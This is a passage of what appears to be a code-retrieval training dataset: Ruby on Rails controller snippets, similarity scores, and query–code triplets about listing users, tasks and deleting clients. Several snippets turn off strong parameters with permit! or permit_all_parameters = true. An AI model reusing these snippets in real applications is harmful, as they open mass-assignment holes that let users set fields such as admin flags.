"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
lists all working users
|
def working
@users=User.where.not(timer_activity: 0)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_all_users\n\n end",
"def list_users(workspace)\n puts \"\\nUser List\\n\\n\"\n tp workspace.users, \"id\", \"name\", \"real_name\", \"status_text\", \"status_emoji\"\nend",
"def list\n\t\t# retrieve all users\n @users = User.find(:all)\n end",
"def list_users\n tp @users, :real_name, :slack_id, :user_name => {:display_method => :name}\n end",
"def list\n @all_users = User.find(:all)\n end",
"def list_users\n @users = User.find(:all)\n end",
"def list_current_users *args\r\n puts \"not implemented yet\"\r\n end",
"def list\n # ask the user_repository for a list of all the users\n users = @user_repository.all\n # pass that list to the view to display\n @view.list_users(users)\n end",
"def getAllUsers()\n puts \"\\nUSERS:\"\n puts \"-------------------------------------------------\"\n @users.each {|user| puts \"ID: \" + user.id.to_s + \" Name: \" + user.name}\n puts \"-------------------------------------------------\"\n end",
"def view_all_users\n # !! get all user so can interact after viewing them? all_users\n # User.select(:username).each_with_index {|user, index| puts \"#{index+1}. #{user.username}\"}\n #??????\n User.select(:username).each {|user| puts user.username}\n end",
"def list_users\n BrickFTP::API::User.all\n end",
"def list_users\n BrickFTP::API::User.all\n end",
"def list_users\n abort \"You have no users within your config file!\".yellow if config.empty?\n puts \"\\nUser Configuration\"\n config.each do |k, v|\n next if k == 'current_user'\n puts \"\\nEnvironment: #{k}\"\n print_hash_values v\n end\n\n list_current_user if current_user_exists?\n end",
"def list\n get('users')['users']\n end",
"def list\n # ask the repo for a list of all the users\n users = @repo.all\n # pass that list to the view to display\n @view.list_users(users)\n end",
"def list_of_users\n\tusers=[]\n\tfor username in Dir.entries(\"/Users\")\n\t\tif !username.start_with?(\".\")\n\t\t\tusers.push(username)\n\t\tend\n\tend\n\treturn users\nend",
"def users\n gateway_check\n @users\n end",
"def index\n @users = User.find_all_with_authorization(current_user)\n end",
"def index\n @sys_users = Sys::User.all\n end",
"def users\n gateway_check\n unavailable_servers_check\n @users\n end",
"def list_users\n self.class.get('/users')\n end",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def index\n\t\t@users = User.all\n\tend",
"def all_users\n `dscl . list /Users`.split(\"\\n\").delete_if { |e| e =~ /^_/ }\n end",
"def index\n @users = User.all\n end",
"def index\n @users = current_user.users\n end",
"def list_users\n http_get(:uri=>\"/users\", :fields=>x_cookie)\n end",
"def index\n \t@all_users = User.all\n end",
"def index\n\t\t# will automatically go into views/users and look for 'index' file to render\n\t\t@all_users = User.all\n\t\t# p @all_users, \"all users\"\n\tend",
"def users\n unless @users\n userListService = $viewContext.getViewService(OTUserListService.java_class)\n @users = userListService.getUserList().sort_by { |user| #sort users by name\n (user.name && !user.name.empty?) ? user.name.downcase.split.values_at(-1, 0) : [''] \n }\n end\n @users\n end",
"def users\n unless @users\n userListService = $viewContext.getViewService(OTUserListService.java_class)\n @users = userListService.getUserList().sort_by { |user| #sort users by name\n (user.name && !user.name.empty?) ? user.name.downcase.split.values_at(-1, 0) : [''] \n }\n end\n @users\n end",
"def get_all\n @user_repository.get_all_users\n end",
"def all_users()\n User.all\n end",
"def index\n \t@users = User.all\n \tend",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def users_list\r\n @users_list = User.order_by_asc('name').find(:all, :conditions => [\"group_id <> ?\", Group.get_guest.id])\r\n if params[:users]\r\n @users_list = User.get_user_list params\r\n end\r\n end",
"def index\n @users = UserService.all_users\n end",
"def index\n \t@users = User.all\n end",
"def new_list_users\n\n end",
"def list_all_members\n @users.each { |x| puts \"-#{x.first}\"}\n end",
"def get_all_user_names\n @user_manager.get_all_user_names\n end",
"def index\n @users = GuestUsers::User.where(host: current_user) || []\n end",
"def html_index\n\t\t@users = User.all\n\tend",
"def index\n @all_users = User.all\n\trender \"list_users\"\n end",
"def user_list\n execute('dscacheutil -q user') do |result|\n users = []\n result.stdout.each_line do |line|\n users << line.split(': ')[1].strip if /^name:/.match?(line)\n end\n\n yield result if block_given?\n\n users\n end\n end",
"def list\n logger.debug \"Processing the list...\"\n @users = User.all.order('updated_at desc') #where(:status=>1)\n end",
"def list(garbage, start)\n @all_user = session_user.agency.users\n @start = start.to_i || 0\n @limit = request.params[\"limit\"] || UserListingLength\n @user = @all_user[@start .. (@start+@limit)-1] # FIXME: Do it with sequel!\n @uparted = @user.partition{|u| @user.index(u) % 2 == 0 }\n end",
"def index\n\t\t# current_user.cdg_id\n\t\t@@users = SoapConnection::ChoferUsers.users( (1 rescue 1) ).compact rescue []\n\t\t@users = @@users\n\tend",
"def index\n\t@users = User.all\nend",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n @userls = Userl.all\n end",
"def index\n @users = User.all\n\tend",
"def index\n @list_users = ListUser.all\n end",
"def index\r\n @users = User.all\r\n end",
"def index\r\n @users = User.all\r\n end",
"def index\r\n @users = User.all\r\n end",
"def user_index\n \t\t@users = User.all\n \tend",
"def users\n @users = User.find(:all)\n end",
"def list_user(param = '1110')\n @group_users.each { |item| puts item.info(param) }\n end",
"def user_list\n\t\tget_call = Curl::Easy.http_get(\"#{@ip_address}:#{@port_2}/v2.0/users/\"\n\t\t) do |curl| curl.headers['x-auth-token'] = @token end\n\t\t\n\t\tputs \"Here is a list of users...\"\n\t\tparsed_json = JSON.parse(get_call.body_str)\n\t\t\n\t\tputs parsed_json\n\t\treturn parsed_json\n\tend",
"def user_list\n @user=User.all\n end",
"def users()\n\t\t\t\tusers = UserList.new()\n\n if dscl?\n # The dscl version is still limited\n idlist = `#{DSCLBIN} . -list /Users UniqueID`\n grouplist = `#{DSCLBIN} . -list /Users PrimaryGroupID`\n idlist.each do | line |\n user = UserInfo.new()\n name,id = line.split\n user.username = name\n user.uid = id.to_i\n users[name] = user\n end\n else\n # get the list of users using niutil\n textlist = `niutil -list . /users`\n textlist.each() { |line|\n line.strip!()\n user = UserInfo.new()\n user.username = line[/^[0-9]+\\s+(\\S+)$/, 1]\n userlist = `niutil -read . /users/#{user.username}`\n userlist.each() { |subline|\n subline.strip!()\n case(subline)\n when(/^home:/)\n user.homedir = subline[/:\\s*(.*)$/, 1]\n when(/^uid:/)\n user.uid = subline[/:\\s*(.*)$/, 1].to_i()\n when(/^gid:/)\n user.gid = subline[/:\\s*(.*)$/, 1].to_i()\n when(/^realname:/)\n user.fullname = subline[/:\\s*(.*)$/, 1]\n end\n }\n users[user.username] = user\n }\n end\n\t\t\t\treturn(users)\n\t\t\tend",
"def index\r\n # @users = User.all\r\n end",
"def users_by_name\n if in_admin_mode?\n query = create_query(:User, :all, by: :name)\n show_selected_users(query)\n else\n flash_error(:permission_denied.t)\n redirect_to(action: \"list_rss_logs\")\n end\n end",
"def list_users\n \t#p params[:search]\n \tif params[:search].nil?\n \t\t@users= User.all\n \telse\n \t\t@users= User.search_users(params)#this function from model\n \tend\n end",
"def users\n watches_unique_by_user.map(&:user)\n end",
"def all\n @users = User.all\n end",
"def get_user_list\n return User.find(:all, :order => 'last_name ASC').collect {|user| [user.full_name, user.id]}\n end",
"def index\n @users = User.all\n @user = retrieve_authenticated_user\n end",
"def get_users\n users = call(CMD_GET_USERS)[:users]\n users.map {|account| User.new(account) }\n end",
"def users_list\n\t\t\tpost= { \"token\" => @token }\n\t\t\tdocxml = nil\n\t\t\tdocxml=nessus_request('users/list', post)\n\t\t\tif docxml.nil?\n\t\t\t\treturn\n\t\t\tend\n\t\t\tusers=Array.new\n\t\t\tdocxml.root.elements['contents'].elements['users'].each_element('//user') { |user|\n\t\t\t\tentry=Hash.new\n\t\t\t\tentry['name']=user.elements['name'].text\n\t\t\t\tentry['admin']=user.elements['admin'].text\n\t\t\t\tentry['lastlogin']=user.elements['lastlogin'].text\n\t\t\t\tusers.push(entry)\n\t\t\t}\n\t\t\treturn users\n\t\tend",
"def index\n @users = User.find(:all)\n end",
"def index\n @users = User.find(:all)\n end",
"def index\n @users = User.find(:all)\n end",
"def show_users\n @users = User.all\n end",
"def collect_user_details\n cmd = 'lsuser -a ALL' # get all user names\n result ||= inspec.backend.run_command(cmd)\n return [] if result.exit_status.to_i != 0\n names = result.stdout.split(\"\\n\")\n users_cache = []\n names.sort.uniq.each do |n|\n users_cache << AixUser(inspec, n)\n end\n users_cache\n end",
"def index # Used for list of favorites or followers/followings list\n @users = User.all\n end",
"def index\n\t\t@users = User.all_except(current_user)\n @folders = current_user.folders unless current_user.nil?\n end",
"def show_Users\n theUsers = User.select{ |user| user.group_id == self.id}\n theUsers\n end",
"def list\n flash[:notice] = \"Het volg-systeem is neergestort als een mir. Iedereen volgt gewoon iedereen. Wel zo communistisch en makkelijk\";\n @user = User.find(:all)\n end",
"def users\n users = []\n if current_user.lead?\n users = object.users.select { |u| u.id != current_user.id }\n users = users.unshift(current_user)\n elsif current_user.dev?\n vms_v = object.vms.select { |vm| vm.is_jenkins }\n users = vms_v.flat_map(&:user).uniq.select { |u| u.id != current_user.id }\n users = users.unshift(current_user)\n else\n users <<= current_user\n end\n users.map { |u| u.id }\n end",
"def list\n \t\tuser = User.find(current_user.id)\n \t @computers = user.computer.all\n end",
"def index\n @users = UserService.getAllUserList\n end",
"def list\n @user = User.all(:order => :login) # sort by login name\n end",
"def index\n # specific_assigned_version_process(__callee__, params)\n @twitter_users = current_user.twitter_users.all\n end",
"def getUserList\n @userList\n end",
"def index\n @users = User.all\n end",
"def index\n @users = User.all\n end",
"def index\n if current_user.admin?\n @users = User.all\n end\n \n end"
] |
[
"0.7850157",
"0.7776798",
"0.77706695",
"0.77378845",
"0.7705273",
"0.7644947",
"0.75823116",
"0.75793475",
"0.74473876",
"0.73671395",
"0.7301737",
"0.7301737",
"0.7295739",
"0.72888047",
"0.7276503",
"0.72087264",
"0.7201529",
"0.7194605",
"0.71751314",
"0.71386087",
"0.71257484",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.7112666",
"0.70833004",
"0.7064446",
"0.7048221",
"0.7038468",
"0.7035885",
"0.70222425",
"0.6997478",
"0.6997478",
"0.6977992",
"0.69773316",
"0.69656086",
"0.6955215",
"0.6955215",
"0.6955215",
"0.6952418",
"0.69376045",
"0.6929588",
"0.692777",
"0.691575",
"0.69027317",
"0.6891901",
"0.68902725",
"0.6863942",
"0.6855453",
"0.6852362",
"0.68385446",
"0.6837515",
"0.6833941",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.682428",
"0.6824254",
"0.6821663",
"0.6818924",
"0.6815303",
"0.6815303",
"0.6815303",
"0.6813871",
"0.6812699",
"0.6812416",
"0.68116945",
"0.67998236",
"0.67967266",
"0.6793293",
"0.6792308",
"0.67892104",
"0.6782947",
"0.6778194",
"0.67778915",
"0.67752606",
"0.67731106",
"0.6772549",
"0.6762167",
"0.6762167",
"0.6762167",
"0.67596006",
"0.67581534",
"0.67550486",
"0.67483324",
"0.67414534",
"0.6738629",
"0.6737248",
"0.67361546",
"0.6731157",
"0.672568",
"0.6725045",
"0.6723011",
"0.6722549",
"0.6722549",
"0.67107284"
] |
0.0
|
-1
|
main list tasks action
|
def list_tasks
#begin
#byebug
@params=search_params[:search]
#byebug
if @params
if !@params[:user].empty?
query = iterate_add_tasks(User.where('handle LIKE ?', "%#{@params[:user]}%"))
if query
@tasks.nil? ? @tasks=query : @tasks=@tasks&query
end
end
if !@params[:client].empty?
query = iterate_add_tasks(Client.where('name LIKE ?', "%#{@params[:client]}%"))
if query
@tasks.nil? ? @tasks=query : @tasks=@tasks&query
end
end
if !@params[:project].empty?
query = iterate_add_tasks(Project.where('name LIKE ?', "%#{@params[:project]}%"))
if query
@tasks.nil? ? @tasks=query : @tasks=@tasks&query
end
end
if !@params[:activity].empty?
query = iterate_add_tasks(Activity.where('name LIKE ?', "%#{@params[:activity]}%"))
if query
@tasks.nil? ? @tasks=query : @tasks=@tasks&query
end
end
if !@params[:date].empty?
@start=Date.parse(@params[:date]).beginning_of_month
@end=Date.parse(@params[:date]).end_of_month
query = Task.where(date: @start..@end)
if query
@tasks.nil? ? @tasks=query : @tasks=@tasks&query
end
end
if @tasks
#byebug
@tasks=@tasks.uniq.sort{|a,b| a[:date] <=> b[:date]}
@tasks=@tasks.reverse
end
flash[:notice]=nil
all=true
@params.each do |p|
#byebug
if !p[1].empty?
all=false
end
end
if all
@tasks=Task.includes(:user, :client, :project, :activity).order(:date).reverse_order.limit(20)
flash[:notice]='Listing the latest 20 tasks'
end
else
@tasks=Task.includes(:user, :client, :project, :activity).order(:date).reverse_order.limit(20)
flash[:notice]='Listing the latest 20 tasks'
end
#rescue
#@tasks=Task.includes(:user, :client, :project, :activity).order(:date).reverse_order.limit(20)
#flash[:notice]='Listing the latest 20 tasks'
#end
@hours=total_hours(@tasks)
respond_to do |format|
format.html
format.csv {send_data tasks_to_csv(@tasks)}
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_tasks\n tasks = @repository.all\n @view.display_tasks(tasks)\n end",
"def list_tasks\n # ASK REPO for the tasks\n tasks = @task_repository.all\n # ASK VIEW to display them\n @tasks_view.display(tasks)\n end",
"def show_tasks\n\t\tputs \"here are the tasks on the #{self.name} list...\"\n\t\t@tasks.map.with_index {|task, i| puts \"#{i.next}. \" + task.description + \" | complete: \" + task.status.to_s}\n\t\tputs \"\\n\"\n\tend",
"def index\n @task_lists = TaskList.all\n end",
"def tasks\n task_list.tasks\n end",
"def index\n @tasklists = Tasklist.all\n end",
"def list_tasks\n config = instantiate_configuration\n config.load 'deploy'\n \n set_up_config(config)\n \n config.task_list(:all)\n end",
"def index\n @tasks = @list.tasks.order(status: :asc)\n return render_success_task_index\n end",
"def list_all_tasks\n #instance of View\n tasks = @repository.all # Array of tasks\n @view.display_all_tasks(tasks) #View to display all the tasks\n end",
"def index\n @task_lists = Task::List.all.active\n end",
"def task_lists(current_token)\n session = RedboothRuby::Session.new(token: current_token)\n client = RedboothRuby::Client.new(session)\n\n client.task_list(:index, project_id: self.id).all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def list_all_tasks\n task = Task.all\nend",
"def list_tasks\r\n unless tasks\r\n puts \"No tasks yet. Add one!\"\r\n return\r\n end\r\n # Pretty-format hash and print\r\n print \" \" + \"ITEM\".ljust(30) + \" | \" +\r\n \"WHEN DUE\".ljust(15) + \" | \" +\r\n \"WHEN ADDED\".ljust(15) + \"\\n\"\r\n tasks.each do |task|\r\n print \"<#{tasks.find_index(task) + 1}>\".ljust(5) +\r\n task[:text].ljust(30) + \" | \" +\r\n task[:due].ljust(15) + \" | \" +\r\n task[:time].ljust(15) + \"\\n\"\r\n end\r\n end",
"def task_list\n self.tasks.map do |task|\n task.text\n end\n end",
"def all_tasks\n @tasks = Task.all\n render :index\n end",
"def list_tasks\n load_tasks\n\n # set '$thor_runner' to true to display full namespace\n $thor_runner = true\n\n list = [] #Thor.printable_tasks(all = true, subcommand = true)\n Thor::Base.subclasses.each do |klass|\n list += klass.printable_tasks(false) unless klass == Thor\n end\n list.sort!{ |a,b| a[0] <=> b[0] }\n\n title = \"repo_manager tasks\"\n shell.say shell.set_color(title, :blue, bold=true)\n shell.say \"-\" * title.size\n shell.print_table(list, :ident => 2, :truncate => true)\n end",
"def index\n @tasks = Task.where(isArchived: false)\n @task = Task.new\n @lists = List.all\n end",
"def index\n @task_lists = @user.task_lists\n end",
"def index\n breadcrumb_for_collections(@collection)\n semantic_breadcrumb @collection.name, @collection\n semantic_breadcrumb \"Tasks\"\n @tasks = @collection.tasks\n end",
"def index\n @todolist = Todolist.find(params[:todolist_id])\n @task = @todolist.tasks.find(params[:id])\n\n @tasks = @todolist.tasks.where(completed: false).order('created_at ASC')\n @completed_tasks = @todolist.tasks.where(completed: true).order('updated_at')\n end",
"def index\n authenticate_user!\n @tasks = current_user.tasks\n end",
"def index\n @tasks = Task.all \n end",
"def tasklists\n get gtasks_tasklists_url\n end",
"def index\n if !current_user.admin then\n redirect_back fallback_location: root_path\n end\n @tasks = Task.all\n end",
"def index\n if Task::TASK_STATES.include?(params[:state]) then\n @tasks = @tasklist.tasks.where(:tstate => params[:state])\n else\n @tasks = @tasklist.tasks\n render action: \"index\", :notice => \"Wrong state. All tasks are listed.\"\n end\n end",
"def display_tasks\n # get the array from the repo\n tasks = @repo.all\n # display all the tasks\n @view.display_tasks(tasks)\n end",
"def index\r\n @tasks = get_sorted_list_of_tasks\r\n respond_to do |format|\r\n format.html # index.html.erb\r\n format.xml { render :xml => @tasks }\r\n end\r\n end",
"def index\n set_tasks\n if @role === 'admin'\n @tasks = Task.all\n end\n if @role === 'merchant'\n @tasks = Task.where(merchant: spree_current_user.merchant_id)\n end\n end",
"def display_tasks(tasks) # we need the tasks\n # CONTRACT:\n # [x] buy croissants\n # [ ] buy coffee\n tasks.each_with_index do |task, index|\n # if task.done?\n # puts \"[x] #{task.name}\"\n # else\n # puts \"[ ] #{task.name}\"\n # end\n\n status = task.done? ? 'x' : ' '\n puts \"[#{status}] #{index + 1}. #{task.name}\"\n end\n end",
"def task_lists\n\t\t@task_lists ||= fetch_latest_task_lists\n\tend",
"def tasks\n @client.list_tasks(cluster: @cluster, service_name: @name)[0]\n end",
"def index\n @tasks = current_user.lists.find(params[:list_id]).tasks\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @tasks }\n end\n end",
"def index\n @tasks = Tasks::List.call(params: task_search_params, user: current_user).model\n @tasks = @tasks.page(params[:page]).order(created_at: :desc)\n end",
"def index\n @pm_tasks = Pm::Task.all\n end",
"def index\n @checklists = Checklist.get_checklist_entries(current_user).get_pending_tasks.paginate(page: params[:page])\n end",
"def tasks(list)\n list_obj = list.is_a?(Wunderlist::List) ? list : lists[list]\n list = list.id if list.is_a? Wunderlist::List\n\n request = prepare_request(Net::HTTP::Get.new \"#{@path}/ajax/lists/id/#{list}\")\n response = @http.request request\n result = []\n\n Nokogiri::HTML(JSON.parse(response.body)[\"data\"]).css(\"li.more\").each do |html_task|\n task = Wunderlist::Task.new\n task.id = html_task.attributes[\"id\"].value.to_i\n task.name = html_task.css(\"span.description\").first.content\n task.important = html_task.css(\"span.fav\").empty? ? false : true\n task.done = html_task.attributes[\"class\"].value.split(\" \").include?(\"done\")\n html_timestamp = html_task.css(\"span.timestamp\")\n task.date = Time.at(html_timestamp.first.attributes[\"rel\"].\n value.to_i).to_date unless html_timestamp.empty?\n task.note = html_task.css('span.note').first.content\n task.api = self\n task.list = list_obj\n\n result << task\n end\n\n result\n end",
"def list_user_tasks\n\t\t@tasks = current_user.get_developer_tasks\n\tend",
"def tasks(project_id)\n account = Config.details \n c = FreshBooks::Client.new(account[\"account\"], account[\"token\"])\n c.task.list :project_id => project_id\n end",
"def get_tasks(param_map, *args)\n #Strip off the first element, since it is not a Task\n get(\"tasks\", param_map, Babar::Task, true, *args)\n end",
"def index\n @api_tasks = Api::Task.all\n end",
"def show # Show tasks method\n all_tasks.map.with_index { |l, i| \"(#{i.next}): #{l}\"} # Show all tasks array in numerical order and whether a task is completed\n end",
"def fetch_latest_tasks_for(list)\n\t\t@tasks[list] = @client.execute(api_method: @gtasks.tasks.list, parameters: { 'tasklist' => list.id }).data.items\n\tend",
"def all\n @main_list = Task.order(\"deadline ASC\")\n @main_list_header = \"All tasks\"\n @done_unbilled_tasks = []\n @active_subnavi = \"ALL\";\n render :index\n end",
"def index\n @tasks = (current_user.admin? ? Task.all : current_user.tasks)\n @error = nil\n if params[:name].present?\n resp = Task.where(\"name ilike '%#{params[:name]}%'\")\n if resp.present? \n if !current_user.admin?\n resp = resp.where(:user_id => current_user.id)\n end\n @tasks = resp \n end\n if resp.blank?\n @error = \"No Task Present with \\'#{params[:name]}\\' name\"\n end\n end \n end",
"def display_tasks\n puts \"What do you want to do? \\n\"\n puts TASKS.values\n end",
"def index\n # GET /tasks\n @tasks = Task.all\n end",
"def tasks(tasklist_id = '@default')\n get gtasks_tasks_url(tasklist_id)\n end",
"def index\n @tasks = current_user.tasks.all.order(id: :desc)\n success_task_index\n end",
"def index\n @tasks = @project.tasks\n end",
"def index\n @tasks = @project.tasks\n end",
"def index\n redirect_to root_path and return unless signed_in?\n set_tasks\n @task = Task.new\n end",
"def index\n @task_items = Task::Item.all\n end",
"def index\n @project = Project.find(params[:project_id])\n @tasks = @project.tasks\n end",
"def show_tasks(tasks)\n tasks.each_with_index do |task, index|\n status = task.done? ? \"x\" : \" \"\n puts \"#{index + 1}. [#{status}] #{task.name}\"\n end\n end",
"def index\n @tasks = @current_user.tasks\n end",
"def get_task_list(id)\n response = request(\n :expects => 200,\n :idempotent => true,\n :method => 'GET',\n :parser => Fog::ToHashDocument.new,\n :path => \"tasksList/#{id}\"\n )\n ensure_list! response.body, :Task\n response\n end",
"def index\n @task_entries = TaskEntry.all\n end",
"def index\n @task_entries = TaskEntry.all\n end",
"def index\n @tasks = Task.all.order( 'starttime DESC' )\n end",
"def index\n @project = Project.find(params[:project_id])\n @tasks = @project.tasks.all\n end",
"def show\n @task_list = TaskList.find(params[:id])\n add_breadcrumb I18n.t(\"tasklist.breadcrumbs.show\"), project_task_list_path\n\n respond_with @task_lists\n end",
"def index\n @tasklistings = Tasklisting.all\n end",
"def index\n authorize! :read, Task\n @tasks = Task.order(sort_column + \" \" + sort_direction).page(params[:page]).per(20)\n\n respond_to do |format|\n format.html # index.html.erb\n end\n end",
"def show\n @tasks = @list.tasks\n # Setting a layout different from the default\n render layout: 'application'\n end",
"def index\n @tasks = @group.tasks\n end",
"def load_special_tasks\n $bot[:tasks][:list] = {\n block: -> do\n list_tasks\n end,\n desc: 'List all available tasks'\n }\n end",
"def index\n active_task\n completed_task\n end",
"def index\n @personal_tasks = PersonalTask.all_personal_tasks(session[:userid])\n @complete = PersonalTask.all_complete_personal_tasks(session[:userid])\n @incomplete = PersonalTask.all_incomplete_personal_tasks(session[:userid])\n end",
"def todo\n @tasks = TaskDecorator.decorate_collection Task.getReadyToDoTasks\n render \"v1/tasks/index\"\n end",
"def tasks\n uri = URI(BASE_URL + TASKS_ENDPOINT)\n\n make_request(uri)\n end",
"def index\n @tasks = Task.where(user_id: current_user.id)\n end",
"def index\n\t if current_user.has_role? :admin\n\t\t @tasks = Task.all\n\t elsif current_user.has_role? :ing\n\t\t @user = User.find(current_user)\n\t\t @tasks = @user.tasks\n\t end\n end",
"def get_tasks(tasklist)\n tasklist_id = tasklist[\"id\"]\n tasklist.tasks = @client.execute(\n api_method: @api.tasks.list,\n parameters: {tasklist: tasklist_id}\n ).data.to_hash[\"items\"]\n end",
"def index\n @project_tasks = ProjectTask.all\n end",
"def index\n @project_tasks = ProjectTask.all\n end",
"def setupTasksList\n require 'tmpdir'\n lTasksFileName = \"#{Dir.tmpdir}/WEACE_Tasks_#{Thread.current.object_id}.lst\"\n File.open(lTasksFileName, 'w') do |oFile|\n oFile << 'TaskID 1\nTaskID 2\nTaskID 3'\n end\n yield(lTasksFileName)\n File.unlink(lTasksFileName)\n end",
"def index\n @tasks = @list.tasks.where(\"type = ?\",\"TaskTemp\").where.not(\"estado = ?\",\"expirada\").order(:prioridad)\n end",
"def index\n @user_tasks_infos = UserTasksInfo.all\n end"
] |
[
"0.80346555",
"0.7865056",
"0.7764971",
"0.7649433",
"0.76244104",
"0.76218575",
"0.76078546",
"0.75892705",
"0.74091125",
"0.73889077",
"0.72768027",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.72676414",
"0.7235183",
"0.72109073",
"0.71893996",
"0.7182689",
"0.7153179",
"0.7123504",
"0.7122293",
"0.7119392",
"0.71176076",
"0.70781904",
"0.7077212",
"0.70762885",
"0.70753413",
"0.70405006",
"0.70280594",
"0.7026455",
"0.702625",
"0.70155",
"0.70071965",
"0.70037377",
"0.6995548",
"0.6990511",
"0.69776833",
"0.69727576",
"0.6953102",
"0.6951332",
"0.6945786",
"0.6943834",
"0.69400734",
"0.6923626",
"0.69194335",
"0.6914624",
"0.6908675",
"0.689542",
"0.68766665",
"0.6876613",
"0.6875888",
"0.6875888",
"0.68584746",
"0.6858448",
"0.6856046",
"0.68534595",
"0.68414086",
"0.6834679",
"0.6831364",
"0.6831364",
"0.68002427",
"0.6797978",
"0.67928946",
"0.6791886",
"0.6785271",
"0.67828524",
"0.6782697",
"0.67807895",
"0.67724216",
"0.6771039",
"0.6769769",
"0.676785",
"0.6749007",
"0.6747931",
"0.6744634",
"0.6731807",
"0.6731807",
"0.6730672",
"0.67289853",
"0.6727934"
] |
0.69733655
|
57
|
controller for deleting clients/projects/activities
|
def delete_client
begin
if c_delete_params[:client]
name=Client.find(c_delete_params[:client]).name
Client.find(c_delete_params[:client]).destroy
flash[:notice]='Deleted client: '+name
return redirect_to '/admin/list_clients'
elsif c_delete_params[:project]
name=Project.find(c_delete_params[:project]).name
Project.find(c_delete_params[:project]).destroy
flash[:notice]='Deleted project: '+name
return redirect_to :back
elsif c_delete_params[:activity]
project=Activity.find(c_delete_params[:activity]).project.id
name=Activity.find(c_delete_params[:activity]).name
Activity.find(c_delete_params[:activity]).destroy
flash[:notice]='Deleted activity: '+name
return redirect_to request.referer + '#project'+project.to_s
elsif c_delete_params[:assignment]
